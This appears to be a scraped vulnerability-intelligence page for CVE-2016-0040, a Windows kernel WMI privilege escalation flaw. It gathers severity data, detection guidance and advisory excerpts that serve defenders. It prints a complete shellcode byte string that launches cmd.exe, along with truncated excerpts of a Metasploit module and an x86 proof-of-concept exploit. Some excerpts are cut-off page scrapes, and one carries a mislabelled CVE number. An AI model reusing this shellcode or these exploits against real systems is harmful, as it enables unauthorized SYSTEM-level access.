CVE-2016-0040
published 2016-02-10CVE-2016-0040: The kernel in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allows local users to gain privileges via a crafted…
PriorityP179high7.8CVSS 3.1
AVLACLPRNUIRSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-04-18
Exploited in the wild
EPSS
24.55%
97.6th percentile
The kernel in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allows local users to gain privileges via a crafted application, aka "Windows Elevation of Privilege Vulnerability."
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_server_2008 | — | — |
Detection & IOCsextracted from sources · hover to see the quote
otherIOCTL_WMI_RECEIVE_NOTIFICATIONS = CTL_CODE(FILE_DEVICE_UNKNOWN, 0x51, METHOD_BUFFERED, FILE_WRITE_ACCESS)↗
bytes↗
\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x2e\x65\x78\x65\x00
- →Monitor DeviceIoControl calls targeting the WMIDataDevice driver handle with IOCTL code 0x51 (IOCTL_WMI_RECEIVE_NOTIFICATIONS). This is the specific IOCTL used to trigger the uninitialized stack variable in ntoskrnl's WMI subsystem. ↗
- →Detect processes opening a handle to \\.\WMIDataDevice with GENERIC_READ | GENERIC_WRITE access from non-system, non-WMI processes, especially when followed by DeviceIoControl. ↗
- →The Metasploit module injects a DLL named CVE-2016-0040.x64.dll into a spawned notepad.exe process. Detect reflective DLL injection into notepad.exe, or the presence of this DLL filename on disk or in memory. ↗
- →The exploit targets the WMI subsystem of ntoskrnl using an uninitialized stack variable. Alert on unexpected kernel-mode code execution originating from WMI receive notification paths on Windows 7 SP0/SP1 x64. ↗
- →The x86 PoC exploit allocates executable memory at fixed virtual address 0x2a000000 (VirtualAlloc with MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE). Detect low-entropy fixed-address executable allocations at this address from user-mode processes. ↗
- →The x86 PoC uses ZwMapUserPhysicalPages (from NTDLL) to spray the kernel stack with a controlled value derived from HalDispatchTable. Monitor for unusual calls to ZwMapUserPhysicalPages from non-system processes. ↗
- →The shellcode in the x86 PoC spawns cmd.exe by injecting into winlogon.exe via CreateRemoteThread. Detect CreateRemoteThread calls targeting winlogon.exe from unprivileged processes. ↗
- ·The Metasploit module explicitly targets only Windows 7 SP0 and SP1 x64 builds; running against WOW64 (32-bit session on 64-bit OS) is not supported and will fail. ↗
- ·The x86 PoC (EDB-40039) overwrites HaliSystemQueryInformation but does not restore it, meaning a BSOD will occur at some point after exploitation — useful for distinguishing attempted exploitation from normal activity. ↗
- ·The Metasploit module requires an existing Meterpreter session and will abort if the session is already SYSTEM-level. ↗
CVSS provenance
nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
vulncheck7.8HIGH
cisa7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Microsoft Windows Kernel Privilege Escalation Vulnerability
cisa·2022-03-28·CVSS 7.8
CVE-2016-0040 [HIGH] CWE-264 Microsoft Windows Kernel Privilege Escalation Vulnerability
Vulnerability: Microsoft Windows Kernel Privilege Escalation Vulnerability
Affected: Microsoft Windows
The kernel in Microsoft Windows allows local users to gain privileges via a crafted application.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2016-0040
Remediation Due Date: 2022-04-18
VulDB
Microsoft Windows 7/Server 2008/Vista SP2 access control (MS16-014 / EDB-44586)
vuldb·2026-04-23·CVSS 7.8
CVE-2016-0040 [HIGH] Microsoft Windows 7/Server 2008/Vista SP2 access control (MS16-014 / EDB-44586)
A vulnerability marked as critical has been reported in Microsoft Windows 7/Server 2008/Vista SP2. Affected by this vulnerability is an unknown functionality. The manipulation leads to improper access controls.
This vulnerability is documented as CVE-2016-0040. The attack needs to be performed locally. Additionally, an exploit exists.
Applying a patch is the recommended action to fix this issue.
GHSA
GHSA-hvmm-257f-6qw7: The kernel in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allows local users to gain privileges via a crafted a
ghsa_unreviewed·2022-05-14
CVE-2016-0040 [HIGH] GHSA-hvmm-257f-6qw7: The kernel in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allows local users to gain privileges via a crafted a
The kernel in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allows local users to gain privileges via a crafted application, aka "Windows Elevation of Privilege Vulnerability."
VulnCheck
Microsoft Windows Kernel Privilege Escalation Vulnerability
vulncheck·2016·CVSS 7.8
CVE-2016-0040 [HIGH] CWE-264 Microsoft Windows Kernel Privilege Escalation Vulnerability
Microsoft Windows Kernel Privilege Escalation Vulnerability
The kernel in Microsoft Windows allows local users to gain privileges via a crafted application.
Affected: Microsoft Windows
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
Exploit PoC: https://vulncheck.com/xdb/58efcffaec67
Remediation Due: 2022-04-18
No detection rules found.
Exploit-DB
Microsoft Windows WMI - Recieve Notification Exploit (Metasploit)
exploitdb·2018-05-04·CVSS 7.8
CVE-2016-0040 [HIGH] Microsoft Windows WMI - Recieve Notification Exploit (Metasploit)
Microsoft Windows WMI - Recieve Notification Exploit (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/post/windows/reflective_dll_injection'
class MetasploitModule 'Windows WMI Recieve Notification Exploit',
'Description' => %q(
This module exploits an uninitialized stack variable in the WMI subsystem of ntoskrnl.
This module has been tested on vulnerable builds of Windows 7 SP0 x64 and Windows 7 SP1 x64.
),
'License' => MSF_LICENSE,
'Author' => [
'smmrootkit', # crash code
'de7ec7ed', # exploit code
'de7ec7ed', # msf module
],
'Arch' => [ARCH_X64],
'Platform' => 'win',
'SessionTypes' => ['meterpreter'],
'DefaultOptions' => {
'EXITFUNC' => 'thread'
},
'Targets' => [
Exploit-DB
Microsoft Windows 7 SP1 (x86) - Local Privilege Escalation (MS16-014)
exploitdb·2016-06-29
CVE-2016-0400 Microsoft Windows 7 SP1 (x86) - Local Privilege Escalation (MS16-014)
Microsoft Windows 7 SP1 (x86) - Local Privilege Escalation (MS16-014)
---
/*
# Exploit Title: Elevation of privilege on Windows 7 SP1 x86
# Date: 28/06-2016
# Exploit Author: @blomster81
# Vendor Homepage: www.microsoft.com
# Version: Windows 7 SP1 x86
# Tested on: Windows 7 SP1 x86
# CVE : 2016-0400
MS16-014 EoP PoC created from
https://github.com/Rootkitsmm/cve-2016-0040/blob/master/poc.cc
Spawns CMD.exe with SYSTEM rights.
Overwrites HaliSystemQueryInformation, but does not replace it, so BSOD will occur at some point
********* EDB Note *********
ntos.h is available here: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40039.zip
*/
#include "stdafx.h"
#include
#include
#include "ntos.h"
#include
typedef union {
HANDLE Handle;
ULONG64 Handle64;
Metasploit
Windows WMI Receive Notification Exploit
metasploit
Windows WMI Receive Notification Exploit
Windows WMI Receive Notification Exploit
This module exploits an uninitialized stack variable in the WMI subsystem of ntoskrnl. This module has been tested on vulnerable builds of Windows 7 SP0 x64 and Windows 7 SP1 x64.
Checkpoint
Graphology of an Exploit – Hunting for exploits by looking for the author’s fingerprints
blogs_checkpoint·2020-10-02
CVE-2019-0859 Graphology of an Exploit – Hunting for exploits by looking for the author’s fingerprints
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
AI Research 2
Android Malware 23
Artificial Intelligence 4
ChatGPT 3
Check Point Research Publications 455
Cloud Security 1
CPRadio 44
Crypto 2
Data & Threat Intelligence 2
Data Analysis 0
Demos 22
Global Cyber Attack Reports 408
How To Guides 13
Ransomware 5
Russo-Ukrainian War 1
Security Report 1
Threat and data analysis 0
Threat Research 174
Web 3.0 Security 11
Wipers 0
## Graphology of an Exploit – Hunting for exploits by looking for the author’s fingerprints
Research by: Itay Cohen, Eyal Itkin
In the past months, our Vulnerability and Malware Research tea
Talos
Microsoft Patch Tuesday - February 2016
blogs_talos·2016-02-09·CVSS 7.8
[HIGH] Microsoft Patch Tuesday - February 2016
Today, Microsoft has released their monthly set of security bulletins designed to address security vulnerabilities within their products. This month’s release contains twelve bulletins addressing 37 vulnerabilities. Five bulletins are rated critical and address vulnerabilities in Internet Explorer, Edge, Windows Journal, Office and Windows PDF. The remaining seven bulletins are rated important and address vulnerabilities in the Network Policy Server (NPS), Active Directory, Windows, Remote Desktop Protocol, WebDAV, Kernel Mode Driver and the .NET Framework.
## Bulletins Rated Critical
Microsoft bulletins MS16-009, MS16-011 through MS16-013, and MS16-015 are rated as critical in this month's release.
MS16-009 and MS16-011 are this month's Internet Explorer and Edge security bulletin resp
Talos
Microsoft Patch Tuesday - February 2016
blogs_talos·2016-02-09·CVSS 7.8
[HIGH] Microsoft Patch Tuesday - February 2016
## Microsoft Patch Tuesday - February 2016
Today, Microsoft has released their monthly set of security bulletins designed to address security vulnerabilities within their products. This month’s release contains twelve bulletins addressing 37 vulnerabilities. Five bulletins are rated critical and address vulnerabilities in Internet Explorer, Edge, Windows Journal, Office and Windows PDF. The remaining seven bulletins are rated important and address vulnerabilities in the Network Policy Server (NPS), Active Directory, Windows, Remote Desktop Protocol, WebDAV, Kernel Mode Driver and the .NET Framework.
## Bulletins Rated Critical
Microsoft bulletins MS16-009, MS16-011 through MS16-013, and MS16-015 are rated as critical in this month's release.
MS16-009 and MS16-011 are this month's Inter
Zscaler
Zscaler found Multiple Security Vulnerabilities | 02-09-2016
blogs_zscaler·CVSS 8.8
[HIGH] Zscaler found Multiple Security Vulnerabilities | 02-09-2016
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
arXiv
Static Detection of Uninitialized Stack Variables in Binary Code
arxiv_fulltext·2020-07-05
Static Detection of Uninitialized Stack Variables in Binary Code
Static Detection of Uninitialized Stack Variables in Binary Code
Static Detection of Uninitialized Stack Variables in Binary Code
Behrad Garmany
Martin Stoffel
Robert Gawlik
Thorsten Holz
Garmany et al.
Horst Görtz Institute for IT-Security (HGI)
Ruhr-Universität Bochum, Germany
\firstname.lastname\@rub.de
## Abstract
More than two decades after the first stack smashing attacks, memory
corruption vulnerabilities utilizing stack anomalies are still prevalent and
play an important role in practice. Among such vulnerabilities, uninitialized
variables play an exceptional role due to their unpleasant property of
unpredictability: as compilers are tailored to operate fast, costly
interprocedural analysis procedures are not used in practice to detect such
vulnerabilities. As a result, comple
http://www.securitytracker.com/id/1034985https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-014https://www.exploit-db.com/exploits/44586/http://www.securitytracker.com/id/1034985https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-014https://www.exploit-db.com/exploits/44586/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2016-0040
2016-02-10
Published
2022-03-28
Added to CISA KEV
Exploited in the wild